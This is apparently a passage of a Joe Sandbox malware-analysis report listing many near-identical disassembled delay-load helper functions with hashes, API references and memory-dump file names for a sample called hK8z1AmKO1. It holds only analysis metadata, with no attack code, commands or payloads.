Instruction ID: 2ce5bee37b06f958aa98a08838e455dc61f8d2da2e398d1916fb46b33e2da0e8
Opcode Fuzzy Hash: 512e7728f5dfb75944f46247c9d31316b5c62322ab6ddec9c5f86c50c3fd33e5
Instruction Fuzzy Hash: 8AB012A636C042AC320C72042C07D3743FCC0C0B1033084DBB50AC11E1E9408C08D231

Function 00B8DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DBD5

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3b041c6b34e5075f9f46459c8a65297e5aed725298157cfd68beb389bdbff48b
Instruction ID: e2e4f076300fdfb165bf1a6dd10bfe5760bdaae1c4d5a76150f32074f0520d13
Opcode Fuzzy Hash: 3b041c6b34e5075f9f46459c8a65297e5aed725298157cfd68beb389bdbff48b
Instruction Fuzzy Hash: F1B012AA36C0416C310C72142C07E3603ECD0C0B1033084EBB11BC01E1E9408C08D231

Function 00B8DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DBD5

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 211e0faa4fd10bb4442f6134eab130caa3612805f030fd0217ea8dfa0991ce39
Instruction ID: f81ac90d1d01f2b1dcecf4dba9451e384835a4bbe6e4ea04487882a8a11b785c
Opcode Fuzzy Hash: 211e0faa4fd10bb4442f6134eab130caa3612805f030fd0217ea8dfa0991ce39
Instruction Fuzzy Hash: 79B012A637C1467C320C32002C07C3743ECC0C0B1033045EBB106D00E1A9408C48D131

Function 00B8DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6fc14794648e3863c6652215f85083da25e1bfe7d130c573d173add311a3065c
Instruction ID: e32cee8aa18436f9c5483c529b24eb8fd37eda4a88ecdf9c3a26571a3c51aa07
Opcode Fuzzy Hash: 6fc14794648e3863c6652215f85083da25e1bfe7d130c573d173add311a3065c
Instruction Fuzzy Hash: 1CB012922AC1016D710C73066D42E3A03DCD0C1B1133081EBB109C01E5E4408C04D731

Function 00B8DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DC36

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 898f1e40e05ab941dd14884bb4216d28cfac1c01e98600139c8f52d8102603f4
Instruction ID: 890da9a8d4e524c98e19bd0b3d210d029860b3ad0bc13f21587a23b55f5974be
Opcode Fuzzy Hash: 898f1e40e05ab941dd14884bb4216d28cfac1c01e98600139c8f52d8102603f4
Instruction Fuzzy Hash: 39B0929666C202AC21083204AA12C3643ECC1C0B113208A9BB209A00A1A5809C44A531

Function 00B8DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DC36

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e863f0b48fd1ad7358c341a772edca79ab9ed073e892a5a227d17abc502ca33b
Instruction ID: c27e52b7c65c4d3832c2e82fc17f8b11192f35f6732b230d3ad6f2231878ba71
Opcode Fuzzy Hash: e863f0b48fd1ad7358c341a772edca79ab9ed073e892a5a227d17abc502ca33b
Instruction Fuzzy Hash: E6B0929666C202AC31087208A812D3603ECC0C0B10320899BB209E11A1A5809C049631

Function 00B8DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DC36

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c46050f2bc18df6003360f206fa33391644d26dbf18ce123951583a018c65377
Instruction ID: 8cf26d0ca1f58e588b0a7b7bca95ed0071832e9f7f84b1b665373bd0022404b4
Opcode Fuzzy Hash: c46050f2bc18df6003360f206fa33391644d26dbf18ce123951583a018c65377
Instruction Fuzzy Hash: D9B0929666C102AC21087208A812D3603ECC0C5B10320899BB609E11A1A5809C049631

Function 00B8D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8f44ea8411a3f260b356090aa4863dbf16e4b67cdac56a81bdc30c58a241a1d2
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: 8f44ea8411a3f260b356090aa4863dbf16e4b67cdac56a81bdc30c58a241a1d2
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 75fafb562ae99b24a706837d4ba71348cc63985cbdb369f9df73da483b0207bc
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: 75fafb562ae99b24a706837d4ba71348cc63985cbdb369f9df73da483b0207bc
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 36a5141e84b9162d314c1f4994b838d303fa649591a0fc36a5cb8e9878cde153
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: 36a5141e84b9162d314c1f4994b838d303fa649591a0fc36a5cb8e9878cde153
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 95841b7ebe7859dc32e418965019a078af55d3de0c1f2c611496c23bc815f1ad
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: 95841b7ebe7859dc32e418965019a078af55d3de0c1f2c611496c23bc815f1ad
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 970b93e336560821b8739f73587e34c3086a540fc23f93b710721a8593bad15e
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: 970b93e336560821b8739f73587e34c3086a540fc23f93b710721a8593bad15e
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cafea0b1133412024b551ceaa1919a3346fbb705c0a9cfcd2512617a89899ac4
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: cafea0b1133412024b551ceaa1919a3346fbb705c0a9cfcd2512617a89899ac4
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c7dc4dae53e668f4e981e0b1dda3f954218f1384831794d84539179475a48bfd
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: c7dc4dae53e668f4e981e0b1dda3f954218f1384831794d84539179475a48bfd
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e79a58f3e17007363b0c14bf7e583567f5cd0c7a415fd6106e0ffbb62f67c277
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: e79a58f3e17007363b0c14bf7e583567f5cd0c7a415fd6106e0ffbb62f67c277
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c56e30c5ead0a720a63b9773e5eaf27a1c69e33856895a01810499bb38ab89cd
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: c56e30c5ead0a720a63b9773e5eaf27a1c69e33856895a01810499bb38ab89cd
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 739dcf9f412420ee92dd538fb72039158174e208b2cbb089349e771efd584eb7
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: 739dcf9f412420ee92dd538fb72039158174e208b2cbb089349e771efd584eb7
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
